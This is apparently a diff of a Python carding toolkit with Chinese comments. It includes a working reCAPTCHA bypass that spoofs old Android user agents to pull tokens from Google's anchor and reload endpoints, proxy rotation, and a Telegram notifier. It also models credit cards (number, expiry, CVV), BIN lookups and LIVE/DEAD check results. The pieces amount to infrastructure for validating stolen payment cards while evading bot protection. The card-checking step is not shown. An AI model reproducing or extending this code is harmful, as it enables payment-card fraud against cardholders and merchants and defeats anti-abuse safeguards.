from typing import List, Optional
def load_proxy_list(proxy_input: Optional[str]) -> List[str]:
"""加载代理列表
Args:
proxy_input: 代理输入,可以是文件路径或逗号分隔的代理字符串
Returns:
代理列表
"""
if not proxy_input:
return []
# 如果是文件,读取文件内容
if os.path.exists(proxy_input):
with open(proxy_input, 'r', encoding='utf-8') as f:
return [line.strip() for line in f if line.strip()]
# 否则按逗号分割
return [p.strip() for p in proxy_input.split(',') if p.strip()]

View File

@@ -0,0 +1,38 @@
"""代理轮换器"""
import itertools
from typing import Optional, Union, List, Dict
class ProxyRotator:
"""代理轮换器,循环使用代理列表"""
def __init__(self, proxies: Optional[Union[str, List[str]]]):
"""初始化代理轮换器
Args:
proxies: 代理字符串或代理列表
"""
# 如果传入的是单个字符串,转换成列表
if isinstance(proxies, str):
proxies = [proxies]
# 如果列表存在且不为空,创建无限循环迭代器
if proxies:
self._proxies = itertools.cycle(proxies)
else:
self._proxies = None
def get(self) -> Optional[Dict[str, str]]:
"""获取下一个代理
Returns:
代理字典,格式为 {'http': proxy, 'https': proxy}
如果没有代理则返回None
"""
if self._proxies:
proxy = next(self._proxies)
return {
'http': proxy,
'https': proxy
}
return None

View File

@@ -0,0 +1,4 @@
"""reCAPTCHA集成模块"""
from .solver import RecaptchaSolver
__all__ = ['RecaptchaSolver']

View File

@@ -0,0 +1,96 @@
"""reCAPTCHA HTTP客户端"""
import logging
import random
import re
import requests
from .constants import OLD_ANDROID_USER_AGENTS
logger = logging.getLogger(__name__)
class RecaptchaClient:
"""reCAPTCHA请求客户端"""
def __init__(self, timeout, proxy_rotator):
"""初始化客户端
Args:
timeout: 请求超时时间
proxy_rotator: 代理轮换器实例
"""
self.timeout = timeout
self.proxy_rotator = proxy_rotator
self.base_url = 'https://www.google.com/recaptcha'
def _random_headers(self):
"""生成随机请求头伪装成旧版Android设备"""
user_agent = random.choice(OLD_ANDROID_USER_AGENTS)
return {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': user_agent
}
def _request(self, method, endpoint, **kwargs):
"""发送HTTP请求
Args:
method: HTTP方法
endpoint: API端点
**kwargs: 额外的请求参数
Returns:
响应文本失败返回None
"""
url = f"{self.base_url}{endpoint}"
kwargs.setdefault('timeout', self.timeout)
kwargs['headers'] = self._random_headers()
kwargs['proxies'] = self.proxy_rotator.get()
try:
logger.debug('Recaptcha request %s %s params=%s', method, url, kwargs.get('params'))
response = requests.request(method, url, **kwargs)
response.raise_for_status()
logger.debug('Recaptcha response %s %s status=%s', method, url, response.status_code)
return response.text
except requests.RequestException as exc:
logger.warning('Recaptcha request failed %s %s: %s', method, url, exc)
return None
def fetch_anchor_token(self, api_type, params):
"""获取anchor token
Args:
api_type: API类型 (api2/enterprise)
params: 请求参数
Returns:
HTML响应文本
"""
return self._request('GET', f'/{api_type}/anchor', params=params)
def fetch_recaptcha_token(self, api_type, site_key, payload):
"""获取最终的reCAPTCHA token
Args:
api_type: API类型
site_key: 站点密钥
payload: POST数据
Returns:
token字符串失败返回None
"""
text = self._request(
'POST',
f'/{api_type}/reload',
params={'k': site_key},
data=payload
)
if text:
match = re.search(r'"rresp","(.*?)"', text)
if match:
return match.group(1)
return None

View File

@@ -0,0 +1,9 @@
"""旧版Android User-Agent常量"""
OLD_ANDROID_USER_AGENTS = [
"Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus 7 Build/JRO03D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.2; en-us; Xoom Build/HTK75D) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Nexus 5 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36"
]

View File

@@ -0,0 +1,149 @@
"""reCAPTCHA求解器"""
import logging
import re
from time import sleep
from .client import RecaptchaClient
logger = logging.getLogger(__name__)
class RecaptchaSolver:
"""同步reCAPTCHA求解器"""
MAX_RETRIES = 20
RETRY_DELAY = 1
def __init__(self, timeout, proxy_rotator):
"""初始化求解器
Args:
timeout: 请求超时时间
proxy_rotator: 代理轮换器实例
"""
self.client = RecaptchaClient(timeout=timeout, proxy_rotator=proxy_rotator)
@staticmethod
def _parse_api_type(anchor_url):
"""解析API类型
Args:
anchor_url: anchor URL
Returns:
(api_type, params_string) 元组
"""
match = re.search(r'(api2|enterprise)/anchor\?(.*)', anchor_url)
if match:
return match.group(1), match.group(2)
return None, None
@staticmethod
def _extract_c_value(html):
"""从HTML中提取c值session token
Args:
html: HTML响应文本
Returns:
c值字符串
"""
match = re.search(r'value="(.*?)"', html)
if match:
return match.group(1)
return None
@staticmethod
def _parse_params(param_str):
"""解析URL参数字符串
Args:
param_str: 参数字符串,如 "k=xxx&co=yyy"
Returns:
参数字典
"""
params = {}
if param_str:
for pair in param_str.split('&'):
if '=' in pair:
key, value = pair.split('=', 1)
params[key] = value
return params
def _build_payload(self, params, c_value):
"""构造请求载荷
Args:
params: 参数字典
c_value: session token
Returns:
POST数据字符串
"""
return (
f"v={params.get('v')}&"
f"reason=q&"
f"c={c_value}&"
f"k={params.get('k')}&"
f"co={params.get('co')}"
)
def solve(self, anchor_url):
"""求解reCAPTCHA
Args:
anchor_url: reCAPTCHA anchor URL
Returns:
reCAPTCHA token字符串
Raises:
ValueError: URL格式无效
RuntimeError: 超过最大重试次数
"""
api_type, param_str = self._parse_api_type(anchor_url)
if not param_str:
logger.error('Invalid anchor URL provided: %s', anchor_url)
raise ValueError('Invalid anchor URL format.')
params = self._parse_params(param_str)
logger.debug('Recaptcha solve start api_type=%s params=%s', api_type, params)
# 重试循环
for attempt in range(1, self.MAX_RETRIES + 1):
logger.debug('Recaptcha attempt %d/%d', attempt, self.MAX_RETRIES)
# 1. 获取anchor token
anchor_html = self.client.fetch_anchor_token(api_type, params)
if not anchor_html:
logger.debug('Anchor response empty, retrying...')
sleep(self.RETRY_DELAY)
continue
# 2. 提取session token
c_value = self._extract_c_value(anchor_html)
if not c_value:
logger.debug('Failed to extract c value from anchor response.')
sleep(self.RETRY_DELAY)
continue
# 3. 构造载荷
payload = self._build_payload(params, c_value)
logger.debug('Payload prepared with keys: %s', list(params.keys()))
# 4. 获取最终token
token = self.client.fetch_recaptcha_token(
api_type,
params.get('k'),
payload
)
if token:
logger.info('Recaptcha solved in %d attempt(s).', attempt)
return token
sleep(self.RETRY_DELAY)
logger.error('Failed to solve reCAPTCHA after %d attempts.', self.MAX_RETRIES)
raise RuntimeError('Failed to solve reCAPTCHA after maximum retries.')

View File

@@ -0,0 +1,4 @@
"""Telegram集成模块"""
from .notifier import send_telegram_message
__all__ = ['send_telegram_message']

View File

@@ -0,0 +1,37 @@
"""Telegram通知发送器"""
import requests
from typing import Optional
def send_telegram_message(
bot_token: str,
chat_id: str,
text: str,
timeout: int = 10
) -> bool:
"""发送Telegram消息
Args:
bot_token: Telegram bot token
chat_id: 聊天ID
text: 消息文本
timeout: 超时时间(秒)
Returns:
是否发送成功
"""
if not bot_token or not chat_id:
return False
try:
url = f'https://api.telegram.org/bot{bot_token}/sendMessage'
payload = {
'chat_id': chat_id,
'text': text,
'parse_mode': 'HTML',
'disable_web_page_preview': True
}
requests.post(url, json=payload, timeout=timeout)
return True
except Exception:
return False

View File

@@ -0,0 +1,11 @@
"""数据模型模块"""
from .card import Card
from .bin_info import BinInfo
from .result import CheckResult, CheckStatus
__all__ = [
'Card',
'BinInfo',
'CheckResult',
'CheckStatus',
]

View File

@@ -0,0 +1,22 @@
"""BIN信息模型"""
from dataclasses import dataclass
from typing import Optional
@dataclass
class BinInfo:
"""BINBank Identification Number信息"""
bin: str
brand: str = 'UNKNOWN'
country: str = 'UNKNOWN'
country_flag: str = 'UNKNOWN'
bank: str = 'UNKNOWN'
card_type: str = 'UNKNOWN'
level: str = 'UNKNOWN'
def __str__(self) -> str:
"""格式化显示"""
return (
f"{self.brand} {self.card_type} {self.level} | "
f"{self.bank} | {self.country} {self.country_flag}"
)

View File

@@ -0,0 +1,46 @@
"""卡片数据模型"""
from dataclasses import dataclass
from typing import Optional
@dataclass
class Card:
"""信用卡数据模型"""
number: str
month: str
year: str
cvv: str
@property
def bin(self) -> str:
"""获取BIN前6位"""
return self.number[:6]
@property
def formatted(self) -> str:
"""格式化为标准字符串"""
return f"{self.number}|{self.month}|{self.year[-2:]}|{self.cvv}"
@staticmethod
def parse(card_string: str) -> Optional['Card']:
"""从字符串解析卡片信息
Args:
card_string: 格式为 "number|mm|yyyy|cvv" 的字符串
Returns:
Card对象解析失败返回None
"""
try:
parts = [s.strip() for s in card_string.strip().split('|')]
if len(parts) != 4:
return None
number, month, year, cvv = parts
month = month.zfill(2)
year = str(year).zfill(4) if len(year) == 2 else year
cvv = cvv[:4]
return Card(number=number, month=month, year=year, cvv=cvv)
except (ValueError, IndexError):
return None

View File

@@ -0,0 +1,37 @@
"""检测结果模型"""
from dataclasses import dataclass
from enum import Enum
from typing import Optional
from .card import Card
from .bin_info import BinInfo
class CheckStatus(Enum):
"""检测状态枚举"""
LIVE = "LIVE"
DEAD = "DEAD"
UNKNOWN = "UNKNOWN"
@dataclass
class CheckResult:
"""卡片检测结果"""
card: Card
status: CheckStatus
message: str
bin_info: Optional[BinInfo] = None
@property
def is_live(self) -> bool:
"""是否为活卡"""
return self.status == CheckStatus.LIVE
@property
def is_dead(self) -> bool:
"""是否为死卡"""
return self.status == CheckStatus.DEAD
def __str__(self) -> str:
"""格式化显示"""
return f"{self.card.formatted} - {self.status.value} - {self.message}"

View File

@@ -0,0 +1,14 @@
"""工具函数模块"""
from .time import format_ts, sleep_random
from .security import generate_password
from .strings import gstr
from .http import get_random_ua, UA
__all__ = [
'format_ts',
'sleep_random',
'generate_password',
'gstr',
'get_random_ua',
'UA',
]

View File

@@ -0,0 +1,28 @@
"""HTTP相关工具函数"""
import random
# User-Agent列表
UA = (
# Desktop Chrome (macOS)
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36',
# Desktop Chrome (Windows)
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36',
# Desktop Edge (Windows)
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0',
# Desktop Chrome (Linux)
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36',
# Desktop Firefox (macOS)
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0',
# Desktop Firefox (Windows)
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0'
)
def get_random_ua():
"""获取随机User-Agent
Returns:
随机选择的User-Agent字符串
"""
return random.choice(UA)

View File

@@ -0,0 +1,43 @@
"""安全相关工具函数"""
import random
import string
def generate_password(min_length, max_length):
"""生成随机强密码
Args:
min_length: 最小长度
max_length: 最大长度
Returns:
生成的密码字符串
"""
# 确定密码长度
length = random.randint(min_length, max_length)
# 定义字符集
lower = string.ascii_lowercase
upper = string.ascii_uppercase
digits = string.digits
symbols = '!@#$%^&*()-_=+[]{}|;:,.<>?/'
# 初始化密码列表,强制包含每种类型至少一个字符
password = [
random.choice(lower),
random.choice(upper),
random.choice(digits),
random.choice(symbols)
]
# 组合所有可用字符
all_chars = lower + upper + digits + symbols
# 填充剩余长度
password += random.choices(all_chars, k=length - len(password))
# 打乱字符顺序
random.shuffle(password)
# 拼接成字符串并返回
return ''.join(password)

View File

@@ -0,0 +1,30 @@
"""字符串处理工具函数"""
def gstr(text, prefix, suffix):
"""从文本中提取指定前缀和后缀之间的字符串
Args:
text: 源文本
prefix: 前缀字符串
suffix: 后缀字符串
Returns:
提取的字符串,如果未找到则返回空字符串
"""
# 检查前缀是否存在
if prefix not in text:
return ''
# 计算截取的起始位置
start = text.find(prefix) + len(prefix)
# 查找后缀的位置
end = text.find(suffix, start)
# 如果找到后缀,则切片返回内容
if end != -1:
return text[start:end]
# 如果没找到后缀,返回空字符串
return ''

View File

@@ -0,0 +1,32 @@
"""时间相关工具函数"""
import random
import time
from datetime import timezone
def format_ts(dt, *, fmt='%Y-%m-%dT%H:%M:%SZ'):
"""格式化时间戳为UTC格式
Args:
dt: datetime对象
fmt: 格式化字符串
Returns:
格式化后的时间字符串
"""
return dt.astimezone(timezone.utc).strftime(fmt)
def sleep_random(min_seconds, max_seconds):
"""随机延迟
Args:
min_seconds: 最小秒数
max_seconds: 最大秒数
Returns:
实际延迟的秒数
"""
delay = random.uniform(min_seconds, max_seconds)
time.sleep(delay)
return delay